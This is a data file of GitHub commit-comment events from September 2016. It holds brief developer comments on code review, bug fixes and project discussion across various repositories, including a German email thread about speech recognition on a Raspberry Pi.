{"id":"4545912593","type":"CommitCommentEvent","actor":{"login":"vokimon"},"repo":{"name":"arthurdejong/python-stdnum"},"payload":{"comment":{"id":18977133,"position":null,"line":null,"path":null,"commit_id":"2c557a0c2e091487fcf9dfe00d3934208136501e","created_at":"2016-09-11T14:32:39Z","updated_at":"2016-09-11T14:32:39Z","body":"Thanks. :-)"}},"created_at":"2016-09-11T14:32:39Z"}
{"id":"4545912769","type":"CommitCommentEvent","actor":{"login":"franciscop"},"repo":{"name":"franciscop/cookies.js"},"payload":{"comment":{"id":18977135,"position":3,"line":3,"path":"bower.json","commit_id":"fd4b02b6b5dc8d26cd91a97d9c2c83a8e68a99a3","created_at":"2016-09-11T14:32:45Z","updated_at":"2016-09-11T14:32:45Z","body":"@Scottydgregory what do you mean?"}},"created_at":"2016-09-11T14:32:45Z"}
{"id":"4545913696","type":"CommitCommentEvent","actor":{"login":"frankleonrose"},"repo":{"name":"things-nyc/arduino-lmic"},"payload":{"comment":{"id":18977137,"position":null,"line":null,"path":null,"commit_id":"6cc4e21bf5e304a40e3a01edd4e4ca751c8f95ea","created_at":"2016-09-11T14:33:22Z","updated_at":"2016-09-11T14:33:22Z","body":"@terrillmoore @GitableRoy The version of SubBand functions that got committed to Matthijs' repo is the 0-based version (sorry, submitted before our 0 vs 1 base discussion). If you're using the master branch of this repo, adjust accordingly.\r\n\r\nEasiest would be to ```#define TTN_DEFAULT_SUBBAND 1``` and use the def ```LMIC_enableSubBand(TTN_DEFAULT_SUBBAND)```. "}},"created_at":"2016-09-11T14:33:22Z"}
{"id":"4545915437","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977138,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T14:34:33Z","updated_at":"2016-09-11T14:34:33Z","body":"> Does Primus only expose Node.js Buffer?\r\n\r\nHistorically we have always used Node.js `Buffer` so I'm not changing this behavior.\r\n\r\n> You also need to copy the buffer if you expect the user to hold on to it past the callback.\r\n\r\nDoes this mean that `uws` free the `ArrayBuffer` memory once the callback is invoked?"}},"created_at":"2016-09-11T14:34:33Z"}
{"id":"4545916220","type":"CommitCommentEvent","actor":{"login":"svalexander"},"repo":{"name":"JsjRoboticsClassroom/signboard-group-5"},"payload":{"comment":{"id":18977140,"position":null,"line":null,"path":null,"commit_id":"97de0de03b73d779a9987ba391bb1091cd02a135","created_at":"2016-09-11T14:35:06Z","updated_at":"2016-09-11T14:35:06Z","body":"looks awesome!"}},"created_at":"2016-09-11T14:35:06Z"}
{"id":"4545916548","type":"CommitCommentEvent","actor":{"login":"johnheenan"},"repo":{"name":"johnheenan/libgda"},"payload":{"comment":{"id":18977142,"position":null,"line":null,"path":null,"commit_id":"993d259e378b7f33165b223105c05e396f11f54e","created_at":"2016-09-11T14:35:17Z","updated_at":"2016-09-11T14:35:17Z","body":"A few clicks of next button for the SimpleUIForm example and the 'Same Data' demo of gdaui-demo shows combo updates are not occurring in both libgda-6.0 (libgda master branch) and libgda-5.0 (LIBGDA_5.2 branch).\r\n\r\nThis change fixes the bug.\r\n\r\nBug details reported at https://bugzilla.gnome.org/show_bug.cgi?id=771132\r\n"}},"created_at":"2016-09-11T14:35:17Z"}
{"id":"4545917545","type":"CommitCommentEvent","actor":{"login":"qiaozhanrong"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18977143,"position":18,"line":52,"path":"src/server/server.h","commit_id":"8de0766bfcbcab5862b4d32bdf245275169bc0aa","created_at":"2016-09-11T14:35:51Z","updated_at":"2016-09-11T14:35:51Z","body":"。。。造轮子也没啥"}},"created_at":"2016-09-11T14:35:51Z"}
{"id":"4545918858","type":"CommitCommentEvent","actor":{"login":"ManuGithubSteam"},"repo":{"name":"ManuGithubSteam/LinJarK"},"payload":{"comment":{"id":18977144,"position":null,"line":null,"path":null,"commit_id":"21f9244272aec08aafc7612d7e04efb415f9637c","created_at":"2016-09-11T14:36:41Z","updated_at":"2016-09-11T14:36:41Z","body":"Hallo Thomas,\n\nLeider ruht mein Linjark Projekt gerade. Da es kein neues Sprachmodell\ngibt und ich leider sehr wenig Zeit habe fehlt mir die Motivation.\nInzwischen läuft auf dem Raspi ein Octoprint server für meinen 3D\nDrucker :-)\n\nMein letzter Stand war, das Simon an einen anderen Entwickler unergeben\nwurde, dieser wollte es schlanker machen und so ähnlich wie Cortana.\nNach anfängliche euphorie scheint es aber eingeschalfen zu sein.\nZumindest hat er sich nicht mehr bei mir gemeldet....\n\nDas mit den Hintergrundgeräuschen kannst du auf zwei arten lösen:\n\n1. (sauber) viel mehr traininssamples (ich habe 2.5 gig und es geht\neinigermaßen)\n\n2. (sehr dirty) du trainierst das rauschen und hinterlegst aber keinen\nbefehl. so wird das zwar erkannt aber es tut dann nix. Geht halt nur\nwenn die störgeräusche annähernd die selben sind.\n\nIch hatte zeitweise eine Mischung von 1 und 2 am laufen und es ging\nrecht gut. Habe mich dann aber für Lösung 1 entschieden.\n\nFreut mich sehr das d soweit gekommen bist!\n\nManuel\n\nOn 09/11/2016 12:54 PM, Thomas301263 wrote:\n> Hallo Manuel,\n>\n> wollte mal nachfragen wie weit Du mit Deinem Raspi gekommen bist.\n>\n> Bei mir geht alles mit Raspi 2 + 3, Ubuntu Mate 16.04 und PHP 7. Jetzt\n> kann ich alles was ich will steuern, nur die\n>\n> Sprachauswertung von Simon könnte verbessert werden. Es passieren immer\n> noch Aktionen die durch Hintergrundgeräusche\n>\n> entstehen.\n>\n> Gibt es denn zu Simon denn schon neue Erkenntnisse?\n>\n>\n> Gruß\n>\n> Thomas\n>\n>\n>\n> Am 05.03.2016 um 13:24 schrieb Manuel:\n> > Hallo Thomas,\n> >\n> > Also um das zusammen zu fassen:\n> > Raspi 2 - langsamer aber ok\n> > Raspi 3 schnell aber abstürze von Simon ?\n> >\n> > Ja das mit den Hintergrundgeräuschen ist ein Problem. Da gibt es nicht\n> > viele Lösungen außer du trainierst auch mit Hintergrundgeräuschen, dann\n> > fällt das nicht mehr so auf. Bei mir zb mein Rechnersummen, das wird\n> dann\n> > einfach als gegeben angesehen. Aber mit Variablem\n> > Hintergrundgeräuschen ist\n> > es da schon schwieriger...\n> >\n> > Es gibt ein Modul für Pulseaudio das die Soundausgane vom PC theoretisch\n> > rausrechnet wenn man die wieder aufnimmt. Habe ich aber nicht so\n> ganz zum\n> > laufen bekommen denke bei mir lag das an der Leitungsverzerrung. Für\n> > andere\n> > Hintergrundgeräusche gibt es leider keine Lösung aber google usw\n> > dürften da\n> > auch Probleme haben.\n> >\n> > as Simon technisch geht, das du den Noise Level hoch setzt, dadurch wird\n> > einfach mehr Rausgefiltert was unter einer Bestimmten Lautstärke\n> ist, dann\n> > musst du aber auch immer Lauter sprechen als der Level. Muss man\n> eben gut\n> > kalibrieren...\n> >\n> > Soweit von mir\n> >\n> > Manuel\n> >\n> > 2016-03-05 12:19 GMT+01:00 Thomas301263 <notifications@github.com>:\n> >\n> > > News\n> > > Also Raspi 2 mit Ubuntu Mate 15.10.3 funktioniert zusammen mit Simon.\n> > > Allerdings solltest Du bevor Du Simon installierst\n> sphinxbase-utils und\n> > > libqt4-sql-sqlite installieren.\n> > > Danach alles wie gehabt. Raspi 2 ist zwar etwas langsam, aber er\n> > > funktioniert mit Simon.\n> > > Habe mir auch gleich nach Bekanntgabe das es Raspi 3 gibt einen\n> > geordert.\n> > > Der ist etwas schneller\n> > > und damit funktioniert Simon gut und akzeptabel schnell. Auch das\n> > > compilieren dauert nicht so lange.\n> > > Das einzige Manko was Simon mit dem Raspi hat, ist das der Raspi nach\n> > > Spracheingaben ab und an neu gestartet werden muss. Irgendwie kommt er\n> > > irgendwo noch durcheinander.\n> > > Mich versteht er schon gut und er macht auch alles so wie ich es\n> > will, nur\n> > > wenn es Hintergrunggeräusche gibt, dann kommt ab und zu was dabei\n> > raus was\n> > > man nicht möchte.\n> > > Fällt Dir dazu etwas ein oder wie hast Du es gelöst, dass er nur auf\n> > > Befehle hört?\n> > > Gruß\n> > > Thomas\n> > >\n> > > —\n> > > Reply to this email directly or view it on GitHub\n> > >\n> >\n> <https://github.com/ManuGithubSteam/LinJarK/commit/21f9244272aec08aafc7612d7e04efb415f9637c#commitcomment-16517377>\n> > > .\n> > >\n> >\n> > —\n> > Reply to this email directly or view it on GitHub\n> >\n> <https://github.com/ManuGithubSteam/LinJarK/commit/21f9244272aec08aafc7612d7e04efb415f9637c#commitcomment-16517620>.\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ManuGithubSteam/LinJarK/commit/21f9244272aec08aafc7612d7e04efb415f9637c#commitcomment-18976749>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADS_4qxrnmW_ADtosO8-D91NpLe3Hd-eks5qo932gaJpZM4HZ6Dl>.\n>\n\n"}},"created_at":"2016-09-11T14:36:41Z"}
{"id":"4545919037","type":"CommitCommentEvent","actor":{"login":"mo0ojava"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":18977145,"position":null,"line":null,"path":null,"commit_id":"ec361a623e457b4d64a06f637309f0204ad20984","created_at":"2016-09-11T14:36:48Z","updated_at":"2016-09-11T14:36:48Z","body":"Thanks for your work regarding this, jj! :+1: "}},"created_at":"2016-09-11T14:36:48Z"}
{"id":"4545920669","type":"CommitCommentEvent","actor":{"login":"socmag"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977146,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T14:37:56Z","updated_at":"2016-09-11T14:37:56Z","body":"ArrayBuffer is a lot more useful than Node Buffer.  It should be faster as\nwell since it's a V8 primitive. I switched over to use them a while ago\nthroughout and haven't looked back.\n\nOn Sep 11, 2016 4:26 PM, \"Alex Hultman\" <notifications@github.com> wrote:\n\n> Does Primus only expose Node.js Buffer? The construction of a Buffer is\n> mainly what took so long time, even though it is zero-copy of the\n> ArrayBuffer. Anyways, yes that is a good solution. This will be version\n> 0.9.0. You also need to copy the buffer if you expect the user to hold on\n> to it past the callback.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/uWebSockets/uWebSockets/commit/56abcced914497e1fc4fe24304b86564bc4aca8d#commitcomment-18977120>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGQZ0hrlHmGvW19xZSCgGSHHTBqTyyBoks5qpA-tgaJpZM4J6Ao6>\n> .\n>\n"}},"created_at":"2016-09-11T14:37:56Z"}
{"id":"4545921480","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977148,"position":9,"line":57,"path":"README.md","commit_id":"44470700db7ff235c74c80ecbe1441594a631b4e","created_at":"2016-09-11T14:38:28Z","updated_at":"2016-09-11T14:38:28Z","body":"5340734602059e4bcb878574697ed17efd15c50f"}},"created_at":"2016-09-11T14:38:28Z"}
{"id":"4545922364","type":"CommitCommentEvent","actor":{"login":"kkaravitis"},"repo":{"name":"wicketstuff/core"},"payload":{"comment":{"id":18977149,"position":31,"line":31,"path":"portlet-parent/wicketstuff-portlet/src/main/java/org/apache/wicket/portlet/WicketPortletConfig.java","commit_id":"2f930ffb0e24f4990def418e1aa1932803cb2f30","created_at":"2016-09-11T14:39:07Z","updated_at":"2016-09-11T14:39:07Z","body":"I changed the code and I opened the #542 pull request. Thanks for the reviewing!"}},"created_at":"2016-09-11T14:39:07Z"}
{"id":"4545923346","type":"CommitCommentEvent","actor":{"login":"abelbeck"},"repo":{"name":"arno-iptables-firewall/aif"},"payload":{"comment":{"id":18977150,"position":null,"line":null,"path":null,"commit_id":"c316801bbd45e7605a4dc63f1c283885b5aa5096","created_at":"2016-09-11T14:39:46Z","updated_at":"2016-09-11T14:39:46Z","body":"@arnova Useful Info:\r\n\r\nRef: http://forum.ipfire.org/viewtopic.php?f=50&t=15124&start=30#p93632\r\n\r\n> In kernels 2.6 each ipset can either contain IPs (iphash) or CIDRs (nethash - which do not accept /32 mask).\r\n> In kernels 3.x and 4.x, the key differences is that hash:ip and hash:net ipsets can have more than 65536 entries and that hash:net ipsets can also include /32 entries.\r\n\r\nSo when the day comes and IPTABLES_IPSET=1 the default, we may want to automatically fallback to IPTABLES_IPSET=0 for 2.6 kernels"}},"created_at":"2016-09-11T14:39:46Z"}
{"id":"4545924566","type":"CommitCommentEvent","actor":{"login":"babaskamsu"},"repo":{"name":"babaskamsu/Rolling-Doors"},"payload":{"comment":{"id":18977151,"position":null,"line":null,"path":null,"commit_id":"74a16556113f2547873f3aeddcd8e402dae0cb8b","created_at":"2016-09-11T14:40:31Z","updated_at":"2016-09-11T14:40:31Z","body":"Mencoba untuk ikut andil di github.Mulai pertama dengan membuat tulisan yang mengulas tentang informasi harga folding gate dan harga rolling door terbaru di Indonesia.Dan mencoba untuk membahas tentang prospek bisnis folding gate dan rolling door di negara Indonesia.\r\n\r\n[Prospek Bisnis Folding Gate](http://www.hargafoldinggate.net)\r\n\r\n\r\n![gambar daftar harga folding gate](https://cloud.githubusercontent.com/assets/22131943/18417965/d191a1ba-7867-11e6-84d9-e17254ac0372.jpg)\r\n\r\n"}},"created_at":"2016-09-11T14:40:31Z"}
{"id":"4545925382","type":"CommitCommentEvent","actor":{"login":"Silph-Road"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":18977153,"position":null,"line":null,"path":null,"commit_id":"ec361a623e457b4d64a06f637309f0204ad20984","created_at":"2016-09-11T14:41:03Z","updated_at":"2016-09-11T14:41:03Z","body":":-) hopefully the new app updates do not bring about too much change."}},"created_at":"2016-09-11T14:41:03Z"}
{"id":"4545927752","type":"CommitCommentEvent","actor":{"login":"Waldi-Kl"},"repo":{"name":"Waldi-Kl/hello-world"},"payload":{"comment":{"id":18977156,"position":null,"line":null,"path":null,"commit_id":"9f33f0c5b0166d37673771b7b31fe83fb0214cdc","created_at":"2016-09-11T14:42:34Z","updated_at":"2016-09-11T14:42:34Z","body":"Nie wiem co się dzieje."}},"created_at":"2016-09-11T14:42:34Z"}
{"id":"4545930231","type":"CommitCommentEvent","actor":{"login":"asiekierka"},"repo":{"name":"BuildCraft/BuildCraftAPI"},"payload":{"comment":{"id":18977160,"position":8,"line":5,"path":"api/buildcraft/api/enums/EnumLaserTableType.java","commit_id":"e0cd96e1daf0d2d4319958716eaf7bc7f45f317d","created_at":"2016-09-11T14:44:13Z","updated_at":"2016-09-11T14:44:13Z","body":"why"}},"created_at":"2016-09-11T14:44:13Z"}
{"id":"4545930419","type":"CommitCommentEvent","actor":{"login":"asiekierka"},"repo":{"name":"BuildCraft/BuildCraftAPI"},"payload":{"comment":{"id":18977161,"position":15,"line":15,"path":"api/buildcraft/api/mj/types/LaserType.java","commit_id":"e0cd96e1daf0d2d4319958716eaf7bc7f45f317d","created_at":"2016-09-11T14:44:20Z","updated_at":"2016-09-11T14:44:20Z","body":"WHYYYYYYYY"}},"created_at":"2016-09-11T14:44:20Z"}
{"id":"4545931373","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977162,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T14:45:04Z","updated_at":"2016-09-11T14:45:04Z","body":"> ArrayBuffer is a lot more useful than Node Buffer.\r\nUnconvinced, you have to use a `DataView` or a `TypedArray` to use it anyway."}},"created_at":"2016-09-11T14:45:04Z"}
{"id":"4545931384","type":"CommitCommentEvent","actor":{"login":"zebastian"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":18977163,"position":null,"line":null,"path":null,"commit_id":"39e23db73719c5c55e58d80f183bb64aa75f0540","created_at":"2016-09-11T14:45:05Z","updated_at":"2016-09-11T14:45:05Z","body":"cool,\r\nI googled for a good way to make this work under linux, but this seems to be harder than expected.\r\na possible way could be to give the qthread its priority and inside the qthread code get the current pid and set a corresponding nice level for its given priority. But that would result in ugly spaghetti code. \r\nWhat is your opinion on this?"}},"created_at":"2016-09-11T14:45:05Z"}
{"id":"4545932644","type":"CommitCommentEvent","actor":{"login":"KristineWolf"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18977166,"position":null,"line":null,"path":null,"commit_id":"798f715b19143b70ae7d71413c7a5a138cf282f0","created_at":"2016-09-11T14:45:55Z","updated_at":"2016-09-11T14:45:55Z","body":"ups meinte gefehlt"}},"created_at":"2016-09-11T14:45:55Z"}
{"id":"4545934179","type":"CommitCommentEvent","actor":{"login":"alicebook12220"},"repo":{"name":"toreal/InfiniTAM"},"payload":{"comment":{"id":18977168,"position":1,"line":1,"path":"InfiniTAM/ITMLib/MeshFusion/rigid_transformPose.cpp","commit_id":"e83e52a6bbbf192458b1cbd23801999136a5ff32","created_at":"2016-09-11T14:46:54Z","updated_at":"2016-09-11T14:46:54Z","body":"1"}},"created_at":"2016-09-11T14:46:54Z"}
{"id":"4545934704","type":"CommitCommentEvent","actor":{"login":"crumdidlyumshis"},"repo":{"name":"ElvUI-WotLK/ElvUI"},"payload":{"comment":{"id":18977169,"position":null,"line":null,"path":null,"commit_id":"6220b2e30cfb352642085886c2ad667c5aa62157","created_at":"2016-09-11T14:47:15Z","updated_at":"2016-09-11T14:47:15Z","body":"lol I like how after 2,000,000 changes it's bumped. ;)) haha"}},"created_at":"2016-09-11T14:47:15Z"}
{"id":"4545936932","type":"CommitCommentEvent","actor":{"login":"afdw"},"repo":{"name":"BuildCraft/BuildCraftAPI"},"payload":{"comment":{"id":18977175,"position":8,"line":5,"path":"api/buildcraft/api/enums/EnumLaserTableType.java","commit_id":"e0cd96e1daf0d2d4319958716eaf7bc7f45f317d","created_at":"2016-09-11T14:48:39Z","updated_at":"2016-09-11T14:48:39Z","body":"Because BuildCraftProperties.LASER_TABLE_TYPE is currently not used."}},"created_at":"2016-09-11T14:48:39Z"}
{"id":"4545939466","type":"CommitCommentEvent","actor":{"login":"socmag"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977184,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T14:50:16Z","updated_at":"2016-09-11T14:50:16Z","body":"Well the Data views are a great feature\n\nYou can create multiple data views on the same underlying set of bytes with\nno copy.  That means you can easily implement C style unions,  and deal\nwith native types.  It's highly performant\n\nWe are using it client side as well to build message protocols and build\ncomplex WebGL user interfaces on vertex buffers and uniform buffers in web\nworkers that need to render at 60fps.\n\nI don't think you will be disappointed\n\nOn Sep 11, 2016 4:45 PM, \"Luigi Pinca\" <notifications@github.com> wrote:\n\n> ArrayBuffer is a lot more useful than Node Buffer.\n> Unconvinced, you have to use a DataView or a TypedArray to use it anyway.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/uWebSockets/uWebSockets/commit/56abcced914497e1fc4fe24304b86564bc4aca8d#commitcomment-18977162>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGQZ0piy6O96rEtgxuMWSYxhtBYrw0xfks5qpBPygaJpZM4J6Ao6>\n> .\n>\n"}},"created_at":"2016-09-11T14:50:16Z"}
{"id":"4545939939","type":"CommitCommentEvent","actor":{"login":"Bunny67"},"repo":{"name":"ElvUI-WotLK/ElvUI"},"payload":{"comment":{"id":18977185,"position":null,"line":null,"path":null,"commit_id":"6220b2e30cfb352642085886c2ad667c5aa62157","created_at":"2016-09-11T14:50:34Z","updated_at":"2016-09-11T14:50:34Z","body":":D"}},"created_at":"2016-09-11T14:50:34Z"}
{"id":"4545941448","type":"CommitCommentEvent","actor":{"login":"marcpare4"},"repo":{"name":"zikula-ev/Formicula"},"payload":{"comment":{"id":18977194,"position":null,"line":null,"path":null,"commit_id":"4ab908cc232c75d61b6aa8cd7c0ba8ecd45522c6","created_at":"2016-09-11T14:51:36Z","updated_at":"2016-09-11T14:51:36Z","body":"I updated the file, but still get an error. See here: http://notabenebaroque.ca/index.php?module=Formicula\r\n"}},"created_at":"2016-09-11T14:51:36Z"}
{"id":"4545945003","type":"CommitCommentEvent","actor":{"login":"WoH"},"repo":{"name":"PokemonGoers/Catch-em-all"},"payload":{"comment":{"id":18977202,"position":1,"line":1,"path":"ionic2/app/pages/about/about-people.ts","commit_id":"6c0422dcdf8301fdc442b40962d2eae02693fbd3","created_at":"2016-09-11T14:54:00Z","updated_at":"2016-09-11T14:54:00Z","body":"What do you think of a structure like:\r\n```\r\npeople = {\r\n  teamX: {\r\n    alias: String\r\n    members: [\r\n      {name: String, link: String}\r\n    ]\r\n  }\r\n}\r\n```\r\n\r\nThis could be used to avoid hardcoding the alias in the html"}},"created_at":"2016-09-11T14:54:00Z"}
{"id":"4545945150","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977203,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T14:54:08Z","updated_at":"2016-09-11T14:54:08Z","body":"Point is, Primus is already an established project and I guess they are not going to break their own interface just because one transformer decides to deviate :smile_cat: "}},"created_at":"2016-09-11T14:54:08Z"}
{"id":"4545945628","type":"CommitCommentEvent","actor":{"login":"asiekierka"},"repo":{"name":"BuildCraft/BuildCraftAPI"},"payload":{"comment":{"id":18977204,"position":8,"line":5,"path":"api/buildcraft/api/enums/EnumLaserTableType.java","commit_id":"e0cd96e1daf0d2d4319958716eaf7bc7f45f317d","created_at":"2016-09-11T14:54:27Z","updated_at":"2016-09-11T14:54:27Z","body":"Why do we need to have this in the API?"}},"created_at":"2016-09-11T14:54:27Z"}
{"id":"4545947021","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"SirVer/ultisnips"},"payload":{"comment":{"id":18977206,"position":null,"line":null,"path":null,"commit_id":"8d77e89d65d5678d3c9b15496e462ab5b8ebd8e9","created_at":"2016-09-11T14:55:24Z","updated_at":"2016-09-11T14:55:24Z","body":"See https://github.com/SirVer/ultisnips/issues/748.\r\nThe PR for YCM is pending."}},"created_at":"2016-09-11T14:55:24Z"}
{"id":"4545947857","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977208,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T14:56:02Z","updated_at":"2016-09-11T14:56:02Z","body":"Any binary data is pointing to shared memory so any usage of it past the callback (especially after another message has been emitted) is going to overwrite the content."}},"created_at":"2016-09-11T14:56:02Z"}
{"id":"4545947918","type":"CommitCommentEvent","actor":{"login":"Jakob2"},"repo":{"name":"Jakob2/c-fake-pong"},"payload":{"comment":{"id":18977209,"position":3,"line":3,"path":"README.md","commit_id":"d49a8ee2518c72ebf654f8c3f2516f5b2f7ff2c4","created_at":"2016-09-11T14:56:05Z","updated_at":"2016-09-11T14:56:05Z","body":"working on the simulation atm\r\n"}},"created_at":"2016-09-11T14:56:05Z"}
{"id":"4545948137","type":"CommitCommentEvent","actor":{"login":"Jakob2"},"repo":{"name":"Jakob2/c-fake-pong"},"payload":{"comment":{"id":18977211,"position":null,"line":null,"path":null,"commit_id":"d49a8ee2518c72ebf654f8c3f2516f5b2f7ff2c4","created_at":"2016-09-11T14:56:13Z","updated_at":"2016-09-11T14:56:13Z","body":"working on simulation atm"}},"created_at":"2016-09-11T14:56:13Z"}
{"id":"4545948441","type":"CommitCommentEvent","actor":{"login":"Alx31"},"repo":{"name":"TipsyOs/frameworks_opt_telephony"},"payload":{"comment":{"id":18977212,"position":null,"line":null,"path":null,"commit_id":"76d3e8f11fc84f198f2abbebd9195920336abc56","created_at":"2016-09-11T14:56:28Z","updated_at":"2016-09-11T14:56:28Z","body":"next time please push only AFTER u've built and tested commits, thanks.\r\nEspecially when commits are already there....https://github.com/TipsyOs/frameworks_opt_telephony/commit/bde243f026ec8bf549e26386d7c275b80254fffe\r\n"}},"created_at":"2016-09-11T14:56:28Z"}
{"id":"4545951492","type":"CommitCommentEvent","actor":{"login":"Trott"},"repo":{"name":"n0f3/node"},"payload":{"comment":{"id":18977217,"position":null,"line":null,"path":null,"commit_id":"86abdf2b3461a34956ae466a5b8e066e4fac9656","created_at":"2016-09-11T14:58:34Z","updated_at":"2016-09-11T14:58:34Z","body":"Minor comments:\r\n\r\n* First line of the commit message should be 50 chars or less.\r\n* Also in that first line of the commit message: 'changed' -> 'change' (or, if there's a problem getting all that's there down to 50 chars, maybe just `test: refactor test-intl` and leave all the details about what was refactored in the body of the commit message)"}},"created_at":"2016-09-11T14:58:34Z"}
{"id":"4545953269","type":"CommitCommentEvent","actor":{"login":"cogKnitter"},"repo":{"name":"adamwage/6.4-chat-app"},"payload":{"comment":{"id":18977223,"position":null,"line":null,"path":null,"commit_id":"0d15c66fea0fb0cee04c975cfa21056dd056935c","created_at":"2016-09-11T14:59:46Z","updated_at":"2016-09-11T14:59:46Z","body":"Are you using react for this or keeping it in vanilla JS?\r\nI have some ideas about your usage of tiny tiny but need more input on your desired structure."}},"created_at":"2016-09-11T14:59:46Z"}
{"id":"4545953727","type":"CommitCommentEvent","actor":{"login":"engenieering"},"repo":{"name":"amiraljion/GIT_PRESENTATION"},"payload":{"comment":{"id":18977224,"position":2,"line":2,"path":"PRESENTATION.txt","commit_id":"304ed1f136b1908f788d7d5e71a9dc1595547bf8","created_at":"2016-09-11T15:00:03Z","updated_at":"2016-09-11T15:00:03Z","body":"te3bit rakik djidan ;)"}},"created_at":"2016-09-11T15:00:03Z"}
{"id":"4545954717","type":"CommitCommentEvent","actor":{"login":"intellix"},"repo":{"name":"angular/angular-cli"},"payload":{"comment":{"id":18977226,"position":7,"line":5,"path":"addon/ng2/blueprints/module/files/__path__/__name__.routing.ts","commit_id":"ba668a8862725f894da3f9608871756507096bb9","created_at":"2016-09-11T15:00:32Z","updated_at":"2016-09-11T15:00:32Z","body":"Strange ˝ character before `Routes);`"}},"created_at":"2016-09-11T15:00:32Z"}
{"id":"4545954922","type":"CommitCommentEvent","actor":{"login":"Trott"},"repo":{"name":"n0f3/node"},"payload":{"comment":{"id":18977228,"position":64,"line":58,"path":"test/parallel/test-intl.js","commit_id":"86abdf2b3461a34956ae466a5b8e066e4fac9656","created_at":"2016-09-11T15:00:40Z","updated_at":"2016-09-11T15:00:40Z","body":"This:\r\n\r\n```js\r\nlet localeString = dtf.format(date0);\r\nassert.strictEqual(localeString, 'Jan 70');\r\n```\r\n\r\n...might be better block scoped and using const:\r\n\r\n```js\r\n{\r\n  const localeString = dtf.format(date0);\r\n  assert.strictEqual(localeString, 'Jan 70');\r\n}\r\n```\r\n"}},"created_at":"2016-09-11T15:00:40Z"}
{"id":"4545958180","type":"CommitCommentEvent","actor":{"login":"thebongz"},"repo":{"name":"thebongz/ImageBrowser"},"payload":{"comment":{"id":18977236,"position":169,"line":235,"path":"image-browser.xcodeproj/project.pbxproj","commit_id":"93baa0e698ecdf6a07e6060fb4f7a5569d79db4d","created_at":"2016-09-11T15:02:40Z","updated_at":"2016-09-11T15:02:40Z","body":"# Test against this version of Node.js\r\nenvironment:\r\n  nodejs_version: \"0.10\"\r\n\r\n# Install scripts. (runs after repo cloning)\r\ninstall:\r\n  # Get the latest stable version of Node.js or io.js\r\n  - ps: Install-Product node $env:nodejs_version\r\n  # install modules\r\n  - npm install\r\n\r\n# Post-install test scripts.\r\ntest_script:\r\n  # Output useful info for debugging.\r\n  - node --version\r\n  - npm --version\r\n  # run tests\r\n  - npm test\r\n\r\n# Don't actually build.\r\nbuild: off\r\n"}},"created_at":"2016-09-11T15:02:40Z"}
{"id":"4545958936","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977237,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T15:02:59Z","updated_at":"2016-09-11T15:02:59Z","body":"Gotcha, thanks."}},"created_at":"2016-09-11T15:02:59Z"}
{"id":"4545959057","type":"CommitCommentEvent","actor":{"login":"Trott"},"repo":{"name":"n0f3/node"},"payload":{"comment":{"id":18977238,"position":73,"line":65,"path":"test/parallel/test-intl.js","commit_id":"86abdf2b3461a34956ae466a5b8e066e4fac9656","created_at":"2016-09-11T15:03:04Z","updated_at":"2016-09-11T15:03:04Z","body":"If you block scope the  use of `localeString` above, you will have to block scope it here as well. It will be a separate variable then, which is probably what you want as it makes the tests more independent units. \r\n\r\n```js\r\n{\r\n  const optsGMT = {timeZone: GMT};\r\n\r\n  // Test format\r\n  const localeString = date0.toLocaleString(['en'], optsGMT);\r\n  assert.strictEqual(localeString, '1/1/1970, 12:00:00 AM');\r\n}\r\n```"}},"created_at":"2016-09-11T15:03:04Z"}
